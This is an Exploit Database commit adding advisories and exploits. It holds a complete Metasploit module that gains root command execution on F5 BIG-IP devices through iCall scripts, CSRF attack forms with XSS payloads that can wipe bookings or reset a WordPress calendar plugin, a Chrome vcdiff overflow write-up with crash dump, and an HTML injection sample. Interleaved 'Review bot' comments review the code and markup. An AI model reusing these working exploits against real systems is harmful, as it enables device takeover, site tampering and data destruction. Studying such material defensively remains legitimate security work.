DB: 2015-11-20

14 new exploits
Offensive Security 2015-11-20 05:02:37 +00:00
parent 043724668f
commit c9f356cc3c
15 changed files with 970 additions and 0 deletions


@ -35021,3 +35021,17 @@ id,file,description,date,author,platform,type,port
38749,platforms/asp/webapps/38749.txt,"Flo CMS 'archivem' Parameter SQL Injection Vulnerability",2013-09-03,ACC3SS,asp,webapps,0
38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0
38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0
38752,platforms/windows/local/38752.c,"Watchguard Server Center Local Privilege Escalation Vulnerability",2013-09-08,"Julien Ahrens",windows,local,0
38753,platforms/php/webapps/38753.html,"WordPress Event Easy Calendar Plugin Multiple Cross Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0
38754,platforms/php/webapps/38754.txt,"eTransfer Lite 'file name' Parameter HTML Injection Vulnerability",2013-09-10,"Benjamin Kunz Mejri",php,webapps,0
38755,platforms/php/webapps/38755.txt,"WordPress mukioplayer4wp Plugin 'cid' Parameter SQL Injection Vulnerability",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0
38756,platforms/php/webapps/38756.txt,"WordPress RokNewsPager Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-18,MustLive,php,webapps,0
38757,platforms/php/webapps/38757.txt,"WordPress RokStories Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-17,MustLive,php,webapps,0
38758,platforms/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0
38759,platforms/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0
38760,platforms/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field SEH Overflow",2015-11-19,"Luis Martínez",windows,dos,0
38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash PoC",2015-11-19,"Vivek Mahajan",windows,dos,0
38762,platforms/windows/webapps/38762.txt,"Netwin SurgeFTP Sever 23d6 - Stored Cross Site Scripting Vulnerabilities.",2015-11-19,Un_N0n,windows,webapps,0
38763,platforms/lin_x86/dos/38763.txt,"Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0
38764,platforms/hardware/remote/38764.rb,"F5 iControl iCall::Script Root Command Execution",2015-11-19,metasploit,hardware,remote,443
38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - CSRF Vulnerability",2015-11-19,"High-Tech Bridge SA",php,webapps,80
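Review bot: the 38762 row's description ends with a trailing period and spells "Server" as "Sever" ("Netwin SurgeFTP Sever 23d6 - Stored Cross Site Scripting Vulnerabilities."), while no other title in this hunk ends with punctuation; suggest "Netwin SurgeFTP Server 23d6 - Stored Cross Site Scripting Vulnerabilities" so the titles stay uniform. The port column is also inconsistent within the hunk: 38765 (Horde Groupware CSRF) is listed with port 80 while every other php/webapps row, including the other CSRF and SQL injection advisories, uses 0; if 0 is the convention for "unspecified", 38765 should follow it, otherwise the other webapps rows should carry their port as well.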



@ -0,0 +1,283 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
def initialize(info = {})
super(
update_info(
info,
'Name' => "F5 iControl iCall::Script Root Command Execution",
'Description' => %q{
This module exploits an authenticated privilege escalation
vulnerability in the iControl API on the F5 BIG-IP LTM (and likely
other F5 devices). This requires valid credentials and the Resource
Administrator role. The exploit should work on BIG-IP 11.3.0
- 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references
for more details)
},
'License' => MSF_LICENSE,
'Author' =>
[
'tom', # Discovery, Metasploit module
'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module
],
'References' =>
[
['CVE', '2015-3628'],
['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['F5 BIG-IP LTM 11.x', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 3 2015",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']),
OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
])
register_advanced_options(
[
OptInt.new('SESSION_WAIT', [ true, 'The max time to wait for a session, in seconds', 5 ]),
OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']),
OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
])
end
def setup
file = datastore['FILENAME']
file ||= ".#{Rex::Text.rand_text_alphanumeric(16)}"
@payload_path = ::File.join(datastore['PATH'], file)
super
end
def build_xml
builder = Nokogiri::XML::Builder.new do |xml|
xml.Envelope do
xml = xml_add_namespaces(xml)
xml['soapenv'].Header
xml['soapenv'].Body do
yield xml
end
end
end
builder.to_xml
end
def xml_add_namespaces(xml)
ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
xml.doc.root.namespace = ns
xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
xml
end
def send_soap_request(pay)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
)
if res
return res
else
vprint_error('No response')
end
false
end
def create_script(name, cmd)
create_xml = build_xml do |xml|
xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item name
end
xml.definitions(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item cmd
end
end
end
send_soap_request(create_xml)
end
def delete_script(script_name)
delete_xml = build_xml do |xml|
xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item script_name
end
end
end
print_error("Error while cleaning up script #{script_name}") unless (res = send_soap_request(delete_xml))
res
end
def script_exists?(script_name)
exists_xml = build_xml do |xml|
xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(exists_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}")
end
def create_handler(handler_name, script_name)
print_status("Creating trigger #{handler_name}")
handler_xml = build_xml do |xml|
xml['per'].create(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item script_name
end
xml.intervals(LONG_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
# we set this to run once every 24h, but because there is no
# start/end time it will run once, more or less immediately, and
# again 24h from now, but by that point hopefully we will have
# cleaned up and the handler/script/etc are gone
xml.item 60 * 60 * 24
end
end
end
res = send_soap_request(handler_xml)
if res
if res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler")
true
else
print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}")
false
end
else
print_error("No response to trigger creation")
false
end
end
def delete_handler(handler_name)
delete_xml = build_xml do |xml|
xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
end
end
print_error("Error while cleaning up handler #{handler_name}") unless (res = send_soap_request(delete_xml))
res
end
def handler_exists?(handler_name)
handler_xml = build_xml do |xml|
xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(handler_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
end
def check
# strategy: we'll send a create_script request, with empty name:
# if everything is ok, the server return a 500 error saying it doesn't like empty names
# XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
# if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
# any other response is considered not vulnerable
res = create_script('', '')
if res && res.code == 500 && res.body =~ /path is empty/
return Exploit::CheckCode::Appears
elsif res && res.code == 401
print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- incorrect USERNAME or PASSWORD?")
return Exploit::CheckCode::Unknown
else
return Exploit::CheckCode::Safe
end
end
def exploit
# phase 1: create iCall script to create file with payload, execute it and remove it.
shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path})
cmd = %(exec /bin/sh -c "#{shell_cmd}")
arg_max = datastore['ARG_MAX']
if shell_cmd.size > arg_max
print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload "\
"or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)"
return false
end
script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}"
print_status("Uploading payload script #{script_name}")
unless (create_script_res = create_script(script_name, cmd))
print_error("No response when uploading payload script")
return false
end
unless create_script_res.code == 200
print_error("Upload payload script failed -- HTTP/#{create_script_res.proto} "\
"#{create_script_res.code} #{create_script_res.message}")
return false
end
unless script_exists?(script_name)
print_error("Payload script uploaded successfully but script was not found")
return false
end
register_file_for_cleanup @payload_path
# phase 2: create iCall Handler, that will actually run the previously created script
handler_name = "handler-#{Rex::Text.rand_text_alphanumeric(16)}"
unless create_handler(handler_name, script_name)
delete_script(script_name)
return false
end
unless handler_exists?(handler_name)
print_error("Trigger created successfully but was not found")
delete_script(script_name)
return false
end
print_status('Waiting for payload to execute...')
# if our payload has not been successfully executed just yet, wait
# until it does or give up
slept = 0
until session_created? || slept > datastore['SESSION_WAIT']
Rex.sleep(1)
slept += 1
end
print_status('Trying cleanup...')
delete_script(script_name)
delete_handler(handler_name)
end
end
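Review bot: delete_script and delete_handler treat any HTTP response as a successful cleanup: each only tests that send_soap_request returned something and never looks at res.code, so a 4xx or 5xx on the delete call prints nothing and the iCall script and periodic handler stay configured on the device (and, per the comment in create_handler, the handler fires again 24h later). Check res.code == 200 the way create_handler does, and re-run script_exists? and handler_exists? after the deletes so the operator is told when the /Common/script-... and /Common/handler-... objects were not removed. Two smaller points: check maps the "access denied" 500 that its own XXX comment describes to CheckCode::Safe, which is a false negative for an account lacking the Resource Administrator role and should return Unknown instead; and the soapenc namespace URI in xml_add_namespaces is "http://schemas.xmlsoap.org/soap/encoding" without the trailing slash that SOAPENV_ENCODINGSTYLE uses, so the two URIs do not match.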

platforms/lin_x86/dos/38763.txt (131 lines, executable file)

@ -0,0 +1,131 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=513
There's an integer overflow issue in sanity checking section lengths when parsing the vcdiff format (used in SDCH content encoding). This results in the parser parsing outside of sane memory bounds when parsing the contents of a vcdiff window - see attached crash PoC.
(/src/sdch/open-vcdiff/src/headerparser.cc)
bool VCDiffHeaderParser::ParseSectionLengths(
bool has_checksum,
size_t* add_and_run_data_length,
size_t* instructions_and_sizes_length,
size_t* addresses_length,
VCDChecksum* checksum) {
ParseSize("length of data for ADDs and RUNs", add_and_run_data_length); // <---- user controlled
ParseSize("length of instructions section", instructions_and_sizes_length); // <---- user controlled
ParseSize("length of addresses for COPYs", addresses_length); // <---- user controlled
if (has_checksum) {
ParseChecksum("Adler32 checksum value", checksum);
}
if (RESULT_SUCCESS != return_code_) {
return false;
}
if (!delta_encoding_start_) {
VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths "
"was called before ParseWindowLengths" << VCD_ENDL;
return_code_ = RESULT_ERROR;
return false;
}
const size_t delta_encoding_header_length =
UnparsedData() - delta_encoding_start_;
if (delta_encoding_length_ !=
(delta_encoding_header_length +
*add_and_run_data_length +
*instructions_and_sizes_length +
*addresses_length)) { // <---- Integer overflow here (32-bit systems only)
VCD_ERROR << "The length of the delta encoding does not match "
"the size of the header plus the sizes of the data sections"
<< VCD_ENDL;
return_code_ = RESULT_ERROR;
return false;
}
return true;
}
These returned lengths are subsequently used to initialise length-checked buffer objects for continuing the parsing (vcdecoder.cc:1024)
size_t add_and_run_data_length = 0;
size_t instructions_and_sizes_length = 0;
size_t addresses_length = 0;
if (!header_parser->ParseSectionLengths(has_checksum_,
&add_and_run_data_length,
&instructions_and_sizes_length,
&addresses_length,
&expected_checksum_)) {
return header_parser->GetResult();
}
if (parent_->AllowInterleaved() &&
// snip...
} else {
// If interleaved format is not used, then the whole window contents
// must be available before decoding can begin. If only part of
// the current window is available, then report end of data
// and re-parse the whole header when DecodeChunk() is called again.
if (header_parser->UnparsedSize() < (add_and_run_data_length +
instructions_and_sizes_length +
addresses_length)) {
return RESULT_END_OF_DATA;
}
data_for_add_and_run_.Init(header_parser->UnparsedData(),
add_and_run_data_length);
instructions_and_sizes_.Init(data_for_add_and_run_.End(),
instructions_and_sizes_length);
addresses_for_copy_.Init(instructions_and_sizes_.End(), addresses_length);
This issue only affects 32-bit builds, since ParseSize is parsing a positive int32_t; on 64-bit builds it cannot be large enough to wrap a size_t.
It's unclear if this is exploitable as a browser-process infoleak; the results of SDCH decoding will be returned to a renderer process, but the way that the returned values are used mean that it is likely that the process will have to survive reads at opposite ends of the address space, which *should* be guaranteed to crash with a 2:2 address space split. It is possible that on 32-bit Windows with a 1:3 address space split this can be survived, or with careful crafting of the input file these reads can be avoided; I've not investigated further at this point.
It appears to be necessary to host the PoC on a legitimate domain; as localhost is not supported for SDCH.
VERSION
Chrome Version: 47.0.2499.0
Operating System: Linux x86
REPRODUCTION CASE
Please include a demonstration of the security bug, such as an attached
HTML or binary file that reproduces the bug when loaded in Chrome. PLEASE
make the file as small as possible and remove any content not required to
demonstrate the bug.
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: browser
Crash State:
eax 0xf9ae8a78 -106001800
ecx 0xe7502d43 -414175933
edx 0x7b83e020 2072240160
ebx 0xf76597a0 -144336992
esp 0xe75025d0 0xe75025d0
ebp 0xe7502798 0xe7502798
esi 0x5 5
edi 0xf9061200 -117042688
eip 0xf1ddebee 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>
eflags 0x210a93 [ CF AF SF IF OF RF ID ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
=> 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>: movzbl (%edx),%ecx
0xf1ddebf1 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+97>: mov (%edi),%esi
0xf1ddebf3 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+99>: cmpb $0x0,0x100(%esi,%ecx,1)
0xf1ddebfb <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+107>: je 0xf1ddec06 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+118>
0xf1ddebfd <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+109>: movsbl %cl,%edx
#0 open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78
#1 0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=<optimized out>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231
#2 0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359
#3 0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=<optimized out>, len=<optimized out>, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887
#4 0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", <incomplete sequence \371\226>, len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393
#5 0xf1d2b17f in DecodeChunk<std::basic_string<char> > (this=0x7b83e020, data=<optimized out>, len=3880791363, output=<optimized out>) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83
#6 net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=<optimized out>) at ../../net/filter/sdch_filter.cc:424
#7 0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 <error: Cannot access memory at address 0x7b83e020>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:131
#8 0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=<optimized out>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145
#9 0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=<optimized out>) at ../../net/url_request/url_request_job.cc:673
#10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=<optimized out>, buf_size=<optimized out>, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38763.zip
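Review bot: the write-up marks the equality test in ParseSectionLengths as the overflow site, but the excerpt from vcdecoder.cc repeats the same three-term sum in its own guard (UnparsedSize() < (add_and_run_data_length + instructions_and_sizes_length + addresses_length)), so that second check is defeated by the same wrap-around and the three Init() calls then run with section lengths the remaining data cannot contain; the description should say so, because a fix that only hardens ParseSectionLengths leaves the decoder-side guard wrapping as well. The safe pattern for both sites is to compare each length on its own against the data still unparsed and subtract it before admitting the next, rather than testing a sum that can overflow size_t on the 32-bit builds the report says are affected. Also, "see attached crash PoC" refers to an attachment that appears here only as the zip link under "Proof of Concept"; point the sentence at that link.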

platforms/php/webapps/38753.html (202 lines, executable file)

@ -0,0 +1,202 @@
source: http://www.securityfocus.com/bid/62269/info
The Event Easy Calendar plugin for WordPress is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
Event Easy Calendar 1.0.0 is vulnerable; other versions may also be affected.
f of Concept
========================
Add Customer
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="data-table_length" value="10">
<input type="hidden" name="radioservice" value="1">
<input type="hidden" name="hdServiceTypeDDL" value="">
<input type="hidden" name="uxTxtControl1" value="new () user com">
<input type="hidden" name="uxTxtControl2" value="<script>alert(1)</script>">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="uxHdnTotalCost" value="0.00">
<input type="hidden" name="param" value="addNewCustomer">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="Add Customer">
</form>
Update Customer
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="data-table_length" value="10">
<input type="hidden" name="radioservice" value="2">
<input type="hidden" name="hdServiceTypeDDL" value="">
<input type="hidden" name="uxTxtControl1" value="new () user com">
<input type="hidden" name="uxTxtControl2" value="NewUser">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="uxHdnTotalCost" value="100.00">
<input type="hidden" name="customerId" value="3">
<input type="hidden" name="uxCustomerEmail" value="new () user com">
<input type="hidden" name="param" value="upDateCustomer">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="Update Customer">
</form>
New Booking
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="altField" value="2013-08-15">
<input type="hidden" name="serviceId" value="2">
<input type="hidden" name="customerId" value="5">
<input type="hidden" name="uxCouponCode" value="">
<input type="hidden" name="uxNotes" value="">
<input type="hidden" name="bookingTime" value="900">
<input type="hidden" name="param" value="frontEndMutipleDates">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="New Booking">
</form>
Add Service
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxServiceColor" value="#00ff00">
<input type="text" name="uxServiceName" value="CSRF service<script>alert(1)</script>">
<input type="hidden" name="uxServiceCost" value="0">
<input type="hidden" name="uxServiceType" value="0">
<input type="hidden" name="uxMaxBookings" value="1">
<input type="hidden" name="uxFullDayService" value="">
<input type="hidden" name="uxMaxDays" value="1">
<input type="hidden" name="uxCostType" value="0">
<input type="hidden" name="uxServiceHours" value="00">
<input type="hidden" name="uxServiceMins" value="30">
<input type="hidden" name="uxStartTimeHours" value="9">
<input type="hidden" name="uxStartTimeMins" value="0">
<input type="hidden" name="uxStartTimeAMPM" value="AM">
<input type="hidden" name="uxEndTimeHours" value="5">
<input type="hidden" name="uxEndTimeMins" value="0">
<input type="hidden" name="uxEndTimeAMPM" value="PM">
<input type="hidden" name="param" value="addService">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Service">
</form>
Add Block Out
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxExceptionsServices" value="4">
<input type="hidden" name="uxExceptionsIntervals" value="1">
<input type="hidden" name="uxExceptionsRepeatDay" value="1">
<input type="hidden" name="uxExceptionsStartsOn" value="">
<input type="hidden" name="uxExceptionsStartTimeHours" value="09">
<input type="hidden" name="uxExceptionsStartTimeMins" value="00">
<input type="hidden" name="uxExceptionsStartTimeAMPM" value="AM">
<input type="hidden" name="uxExceptionsEndTimeHours" value="05">
<input type="hidden" name="uxExceptionsEndTimeMins" value="00">
<input type="hidden" name="uxExceptionsEndTimeAMPM" value="PM">
<input type="hidden" name="uxExceptionsDay" value="0">
<input type="hidden" name="uxExceptionsDayEndsOn" value="">
<input type="hidden" name="uxExceptionsWeekDay1" value="Sun">
<input type="hidden" name="uxExceptionsWeekDay2" value="Wed">
<input type="hidden" name="uxExceptionsRepeatWeeks" value="9">
<input type="hidden" name="uxExceptionsWeekStartsOn" value="2013-08-22">
<input type="hidden" name="uxExceptionsWeekStartTimeHours" value="09">
<input type="hidden" name="uxExceptionsWeekStartTimeMins" value="00">
<input type="hidden" name="uxExceptionsWeekStartTimeAMPM" value="AM">
<input type="hidden" name="uxExceptionsWeekEndTimeHours" value="05">
<input type="hidden" name="uxExceptionsWeekEndTimeMins" value="00">
<input type="hidden" name="uxExceptionsWeekEndTimeAMPM" value="PM">
<input type="hidden" name="uxExceptionsWeek" value="0">
<input type="hidden" name="uxExceptionsWeekEndsOn" value="">
<input type="hidden" name="param" value="insertExceptionWeeks">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Block Out">
</form>
Add Cupon
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxDefaultCoupon" value="XSS<script>alert('xss')</script>">
<input type="hidden" name="uxValidFrom" value="2013-08-15">
<input type="hidden" name="uxValidUpto" value="2013-08-22">
<input type="hidden" name="uxAmount" value="50">
<input type="hidden" name="uxDdlAmountType" value="1">
<input type="hidden" name="uxApplicableOnAllProducts" value="1">
<input type="hidden" name="uxDdlBookingServices" value="4">
<input type="hidden" name="param" value="addCoupons">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Cupon">
</form>
Default Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxDdlDefaultCurrency" value="United States Dollar">
<input type="hidden" name="uxDdlDefaultCountry" value="United States of America">
<input type="hidden" name="uxDefaultDateFormat" value="0">
<input type="hidden" name="uxDefaultTimeFormat" value="0">
<input type="hidden" name="uxDefaultTimeZone" value="-5.0">
<input type="hidden" name="uxServiceDisplayFormat" value="0">
<input type="hidden" name="param" value="updateGeneralSettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Default Settings">
</form>
Reminder Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxReminderSettings" value="1">
<input type="hidden" name="uxReminderInterval" value="1 hour">
<input type="hidden" name="param" value="UpdateReminderSettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Reminder Settings">
</form>
PayPal Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
Email: <input type="text" name="uxMerchantEmailAddress" placeholder="enter your PayPal email here">
<input type="hidden" name="uxPayPal" value="1">
<input type="hidden" name="uxPayPalUrl" value="https://paypal.com/cgi-bin/webscr";>
<input type="hidden" name="uxThankyouPageUrl" value="http://google.com";>
<input type="hidden" name="uxCancellationUrl" value="http://google.com";>
<input type="hidden" name="param" value="UpdatePaymentGateway">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="PayPal Settings">
</form>
Mailchimp Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxMailChimp" value="1">
<input type="hidden" name="uxMailChimpApiKey" value="12345678">
<input type="hidden" name="uxMailChimpUniqueId" value="87654321">
<input type="hidden" name="uxDoubleOptIn" value="false">
<input type="hidden" name="uxWelcomeEmail" value="false">
<input type="hidden" name="param" value="UpdateAutoResponder">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Mailchimp Settings">
</form>
Facebook Connect
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxFacebookConnect" value="1">
<input type="hidden" name="uxFacebookAppId" value="12345678">
<input type="hidden" name="uxFacebookSecretKey" value="87654321">
<input type="hidden" name="param" value="UpdateFacebookSocialMedia">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Facebook Connect">
</form>
Auto Approve
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxAutoApprove" value="1">
<input type="hidden" name="param" value="AutoApprove">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Auto Approve">
</form>
Delete All Bookings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="param" value="DeleteAllBookings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Delete All Bookings">
</form>
Restore Factory Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="param" value="RestoreFactorySettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Restore Factory Settings">
</form>
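Review bot: the heading before the first form reads "f of Concept" and is evidently a truncated "Proof of Concept", and every form's action attribute carries a stray "; after the closing quote (action="http://www.example.com/wp-admin/admin-ajax.php";>), which is invalid HTML and reads as a mail-to-web conversion artifact, so the forms as written are malformed markup. On the substance, each request goes to admin-ajax.php with only a param and an action (bookingsLibrary or dashboardLibrary) and no nonce field, which is what makes the requests forgeable; the advisory would be more useful to site owners if it stated that the fix is for those AJAX handlers to require a WordPress nonce (check_ajax_referer) and a capability check before acting, and named the plugin version in which that happens, if any.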

platforms/php/webapps/38754.txt (22 lines, executable file)

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/62313/info
eTransfer Lite is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
eTransfer Lite 1.0 is vulnerable; other versions may also be affected.
<bq>The following files are hosted live from the iPad's Docs folder.</bq><p><b>Images:<br><br></b>
<a href="http://www.example.com/%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Es2.png"><[PERSISTENT INJECTED SCRIPT
CODE!]">s2.png</a>
( 51.8 Kb, 2013-08-25 02:09:25 +0000)<br />
<a href="a2b642e7de.jpg">a2b642e7de.jpg</a>
( 238.0 Kb, 2013-08-25 02:08:13 +0000)<br />
</p><br><br><br><hr><br><br><br><center><form
action="" method="post" enctype="multipart/form-data" name="form1"
id="form1"><label>Upload file to iPad <input type="file"
name="file" id="file" /></label><label> <input
type="submit" name="button" id="button" value="Submit"
